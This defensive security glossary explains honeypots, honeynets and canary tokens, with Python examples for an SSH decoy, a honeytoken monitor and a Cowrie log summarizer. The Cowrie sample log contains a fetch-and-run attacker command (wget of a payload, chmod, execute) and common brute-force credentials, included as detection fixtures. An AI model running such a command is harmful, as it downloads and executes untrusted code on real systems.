Defensive Security Glossary

Honeypot

A single decoy system that lures attackers and records their behavior. Because no legitimate user has any reason to contact it, every connection is suspicious by default and false positives are rare (your own vulnerability scanners and inventory tools are the usual exception and should be allowlisted). Honeypots are the foundation: deception technology extends the concept with canary tokens, fake credentials, and entire honeynet infrastructures.

A honeypot is a decoy system: It looks like a real, valuable server to attackers—but it is a monitored trap that records the attacker’s activities and triggers alerts as soon as someone interacts with it.

How a Honeypot Works

In addition to real production servers, the network contains a honeypot server that is intentionally made to look "vulnerable." When an attacker touches the honeypot:

  • Alert sent to SOC/SIEM
  • All activities are logged
  • The attacker’s tactics become visible

Basic Principle: No one should touch a honeypot—no legitimate user has a reason to do so. Any connection to the honeypot is automatically suspicious.
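What the three bullets above look like in practice, as an added example that is not code from the original page: a minimal low-interaction decoy that presents a fake SSH banner, records who connected and what they sent first, and raises an alert for every contact. The banner string, the port 2222 and the allowlisted scanner address 10.0.0.5 are assumptions for the example; the alert callback stands in for whatever forwards events to your SOC/SIEM.

```python
import json
import socket
import socketserver
import threading
import time
from datetime import datetime, timezone

# Assumptions for this example (not from the page): the decoy imitates an
# OpenSSH banner on port 2222, and SCANNER_ALLOWLIST holds the address of our
# own vulnerability scanner, whose contact is expected and not an attack.
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n"
SCANNER_ALLOWLIST = {"10.0.0.5"}


class HoneypotHandler(socketserver.BaseRequestHandler):
    """One inbound connection: send the fake banner, capture the client's
    first message, alert, and record the contact."""

    def handle(self):
        src_ip, src_port = self.client_address[:2]
        self.request.settimeout(3.0)
        try:
            self.request.sendall(FAKE_BANNER)
            client_banner = self.request.recv(256)
        except (socket.timeout, OSError):
            client_banner = b""
        event = {
            "ts": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "sensor": "ssh-decoy",
            "src_ip": src_ip,
            "src_port": src_port,
            "client_banner": client_banner.decode("ascii", "replace").strip(),
            # Nobody has a reason to talk to the decoy, so every contact is
            # high severity, except our own scanner (the known false positive).
            "severity": "info" if src_ip in SCANNER_ALLOWLIST else "high",
        }
        self.server.alert(event)       # forward to SOC/SIEM first ...
        self.server.events.append(event)  # ... then keep the local record


class Honeypot(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address, alert):
        super().__init__(address, HoneypotHandler)
        self.events = []     # in-memory record of every contact
        self.alert = alert   # callback that forwards one event to SOC/SIEM


def siem_alert(event):
    """Stand-in for SIEM forwarding: emit one JSON line (e.g. to syslog)."""
    print(json.dumps(event))


def start_honeypot(host="127.0.0.1", port=2222, alert=siem_alert):
    """Bind the decoy and serve it on a background thread."""
    srv = Honeypot((host, port), alert)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def wait_for_events(srv, count, timeout=3.0):
    """Block until the decoy has recorded `count` contacts (or time out)."""
    deadline = time.monotonic() + timeout
    while len(srv.events) < count and time.monotonic() < deadline:
        time.sleep(0.05)
    return len(srv.events) >= count


def probe(host, port, banner=b"SSH-2.0-libssh_0.9.6\r\n"):
    """Behave like a scanner: connect, read the banner, answer with our own."""
    with socket.create_connection((host, port), timeout=3) as s:
        server_banner = s.recv(256)
        s.sendall(banner)
    return server_banner


if __name__ == "__main__":
    srv = start_honeypot()
    print("decoy listening on 127.0.0.1:2222; sending one self-probe")
    probe("127.0.0.1", 2222)
    wait_for_events(srv, 1)
    srv.shutdown()
```

The decoy never authenticates anyone and never runs commands, which is what keeps the risk low; the value lies in the recorded source address and client banner, which already tell you who is scanning and with what tooling.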

Types of Honeypots

Low-Interaction Honeypots:

  • Simulate specific services (e.g., SSH, HTTP) without a real operating system
  • Easy to operate, low risk
  • Collect basic intelligence: Who is scanning, which exploits are being attempted?
  • Tools: Honeyd, Cowrie (SSH/Telnet; it emulates a shell and is usually classed as medium-interaction), Dionaea

High-Interaction Honeypots:

  • Real systems with real software, intentionally poorly secured
  • Attackers can interact more deeply—and are closely monitored
  • High risk: Attackers could use the honeypot as a springboard
  • Requires strict network monitoring and containment

Honeynets:

  • An entire simulated network consisting of multiple honeypots
  • Simulates a complete IT infrastructure
  • Used for research to study attack patterns

Deception Technology:

  • Modern advancement: Fake credentials, fake files, fake database entries, collectively known as honeytokens (canary tokens are one widely used implementation)
  • Easier to deploy than a full decoy host, and effective because a token has no legitimate use: any access to it is an alert

Canary Tokens - Honeypots for Everyone

Canary Tokens (canarytokens.org, run by Thinkst) provide the following for free:

  • Fake DNS tokens: A domain name that triggers an alert when someone resolves it
  • Fake AWS keys: Fake credentials that trigger an alert when used
  • Fake Word document: Opening it triggers an alert
  • Fake password file ("passwords.xlsx"): Opening it = Alert

Practical example: A file named "Passwords_2026.xlsx" as a Canary Token on a file server. If an attacker (or a curious employee) opens it, it immediately sends a notification.
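The fake-AWS-key and fake-file tokens above are hosted by canarytokens.org, but the same detection can be built in-house. The following is an added example, not code from the page or from Thinkst: a small honeytoken monitor that registers a bait AWS access key ID (an IAM user created with no permissions) and a bait spreadsheet path, then scans constructed CloudTrail records and Windows Security 4663 file-access events for any touch of either. The key ID `AKIAEXAMPLEHONEY0001`, the path, the user names and the IP addresses are all made up for the example; the event shapes follow CloudTrail and event 4663 but are reduced to the fields used here.

```python
import json

# Token registry (constructed for this example): the AWS key ID belongs to an
# IAM user we created with no permissions, the path is a bait spreadsheet on a
# file server. Neither has any legitimate use, so any touch is an alert.
HONEYTOKENS = {
    "aws_access_key_id": {"AKIAEXAMPLEHONEY0001": "bait key planted in devops wiki"},
    "file_path": {r"D:\Shares\Finance\Passwords_2026.xlsx": "bait spreadsheet on FS01"},
}

# Constructed sample events (assumption: shapes follow a CloudTrail record and
# a Windows Security event 4663, reduced to the fields used here).
SAMPLE_EVENTS = [
    {"source": "cloudtrail", "eventTime": "2026-01-05T03:12:44Z",
     "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.7",
     "userAgent": "aws-cli/2.15.0", "errorCode": "AccessDenied",
     "userIdentity": {"userName": "wiki-bot", "accessKeyId": "AKIAEXAMPLEHONEY0001"}},
    {"source": "cloudtrail", "eventTime": "2026-01-05T03:13:01Z",
     "eventName": "DescribeInstances", "sourceIPAddress": "10.0.0.42",
     "userAgent": "terraform/1.7",
     "userIdentity": {"userName": "ci-deploy", "accessKeyId": "AKIAEXAMPLEREALKEY99"}},
    {"source": "windows-security", "EventID": 4663, "TimeCreated": "2026-01-05T08:45:10Z",
     "Computer": "FS01", "SubjectUserName": "j.mueller", "Accesses": "ReadData",
     "ProcessName": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ObjectName": r"D:\Shares\Finance\passwords_2026.xlsx"},
    {"source": "windows-security", "EventID": 4663, "TimeCreated": "2026-01-05T08:46:30Z",
     "Computer": "FS01", "SubjectUserName": "a.schmidt", "Accesses": "ReadData",
     "ProcessName": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ObjectName": r"D:\Shares\Finance\Budget_2026.xlsx"},
]


def _normalize(token_type, value):
    """Windows paths are case-insensitive; AWS key IDs are not."""
    return value.lower() if token_type == "file_path" else value


def extract_candidates(event):
    """Yield (token_type, value, context) for each field that could carry a token."""
    if event.get("source") == "cloudtrail":
        ident = event.get("userIdentity", {})
        if ident.get("accessKeyId"):
            yield ("aws_access_key_id", ident["accessKeyId"], {
                "ts": event.get("eventTime"),
                "actor": ident.get("userName"),
                "src": event.get("sourceIPAddress"),
                # An AccessDenied call still counts: the key was used at all.
                "detail": f"{event.get('eventName')} via {event.get('userAgent')} "
                          f"-> {event.get('errorCode', 'Success')}",
            })
    elif event.get("source") == "windows-security" and event.get("EventID") == 4663:
        if event.get("ObjectName"):
            yield ("file_path", event["ObjectName"], {
                "ts": event.get("TimeCreated"),
                "actor": event.get("SubjectUserName"),
                "src": event.get("Computer"),
                "detail": f"{event.get('Accesses')} by {event.get('ProcessName')}",
            })


def scan_events(events, tokens=HONEYTOKENS):
    """Return one alert per event that touches a registered honeytoken."""
    index = {t: {_normalize(t, v): label for v, label in vals.items()}
             for t, vals in tokens.items()}
    alerts = []
    for event in events:
        for token_type, value, ctx in extract_candidates(event):
            label = index.get(token_type, {}).get(_normalize(token_type, value))
            if label:
                alerts.append({"token_type": token_type, "token": value,
                               "label": label, **ctx})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Two details matter in practice: the bait key must be an IAM user with no permissions at all, so that the only thing an attacker gains by trying it is the alert, and the label attached to each token should say where it was planted, because that tells you which system the attacker has already reached.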

Honeypots and Threat Intelligence

Honeypots are valuable sources of Threat Intelligence:

  • Which exploits are actively being used?
  • Which IP addresses and botnet infrastructure are being used?
  • Which malware is being dropped?
  • What tactics do attackers use after initial access?
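Answering the four questions above from raw honeypot output, as an added example that is not part of the original page: a summarizer for Cowrie's newline-delimited JSON log. The event names and field names (`cowrie.session.connect`, `cowrie.login.failed`, `cowrie.login.success`, `cowrie.command.input`, `cowrie.session.file_download`, `src_ip`, `session`, `username`, `password`, `input`, `url`, `shasum`) are the ones Cowrie emits; the sample lines, IP addresses, credentials, commands, URL and hash are constructed for the example.

```python
import json
from collections import Counter, defaultdict

# Constructed sample in Cowrie's JSON log format (eventid and field names are
# Cowrie's; the IPs, credentials, commands, URL and hash are made up).
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"203.0.113.7","timestamp":"2026-01-05T02:11:03Z"}
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.7","username":"root","password":"123456","timestamp":"2026-01-05T02:11:05Z"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.7","username":"root","password":"admin123","timestamp":"2026-01-05T02:11:07Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"uname -a","timestamp":"2026-01-05T02:11:08Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"cd /tmp; wget http://198.51.100.9/x86 -O .x; chmod +x .x; ./.x","timestamp":"2026-01-05T02:11:09Z"}
{"eventid":"cowrie.session.file_download","session":"a1","src_ip":"203.0.113.7","url":"http://198.51.100.9/x86","shasum":"3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b","timestamp":"2026-01-05T02:11:10Z"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"198.51.100.23","timestamp":"2026-01-05T02:30:00Z"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"198.51.100.23","username":"admin","password":"admin","timestamp":"2026-01-05T02:30:01Z"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"198.51.100.23","username":"root","password":"123456","timestamp":"2026-01-05T02:30:02Z"}
{"eventid":"cowrie.session.connect","session":"b3","src_ip":"198.51.100.23","timestamp":"2026-01-05T02:31:00Z"}
{"eventid":"cowrie.login.failed","session":"b3","src_ip":"198.51.100.23","username":"pi","password":"raspberry","timestamp":"2026-01-05T02:31:01Z"}
"""


def parse_cowrie(text):
    """Parse newline-delimited JSON, skipping blank or truncated lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a half-written last line of a live log
    return events


def summarize(events):
    """Reduce raw events to: who scans, which credentials they try,
    what they do after a successful login, and what they drop."""
    sessions_per_ip = Counter()
    credentials = Counter()
    successes = set()               # sessions in which a login succeeded
    post_login = defaultdict(list)  # session -> commands typed after success
    downloads = {}                  # url -> sha256 reported by Cowrie
    for ev in events:
        kind = ev.get("eventid")
        if kind == "cowrie.session.connect":
            sessions_per_ip[ev["src_ip"]] += 1
        elif kind in ("cowrie.login.failed", "cowrie.login.success"):
            credentials[(ev["username"], ev["password"])] += 1
            if kind == "cowrie.login.success":
                successes.add(ev["session"])
        elif kind == "cowrie.command.input" and ev["session"] in successes:
            post_login[ev["session"]].append(ev["input"])
        elif kind == "cowrie.session.file_download":
            downloads[ev["url"]] = ev.get("shasum")
    return {
        "sessions_per_ip": sessions_per_ip,
        "credentials": credentials,
        "post_login_commands": dict(post_login),
        "downloads": downloads,
    }


def iocs(summary):
    """Flatten the summary into shareable indicators: IPs, payload URLs, hashes."""
    return {
        "ips": sorted(summary["sessions_per_ip"]),
        "urls": sorted(summary["downloads"]),
        "sha256": sorted(h for h in summary["downloads"].values() if h),
    }


if __name__ == "__main__":
    s = summarize(parse_cowrie(SAMPLE_LOG))
    print("sessions per IP:", s["sessions_per_ip"].most_common())
    print("top credentials:", s["credentials"].most_common(3))
    print("post-login commands:", s["post_login_commands"])
    print("IOCs:", iocs(s))
```

Tracking commands only for sessions that reached `cowrie.login.success` separates the noisy credential-stuffing bots (here 198.51.100.23, two sessions, no success) from the session that actually went on to fetch and run a payload, which is the one whose URL and hash are worth sharing.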

Security firms operate global sensor and honeypot networks (e.g., GreyNoise) and internet-wide scanning services (e.g., Shodan) to identify attack trends.

In Germany: Honeypots are legal—as long as they do not actively induce criminal acts by the attacker (no "agent provocateur" situation). Merely observing and documenting attacks is permitted. Honeypot operators should clarify the legal framework with a specialist, particularly if honeypot data is to be used for law enforcement purposes.

Honeypots in a Zero-Trust Context

In a zero-trust architecture, honeypots and deception technologies complement the traditional security stack: They assume that attackers are already inside the network—and use decoys to detect and track them.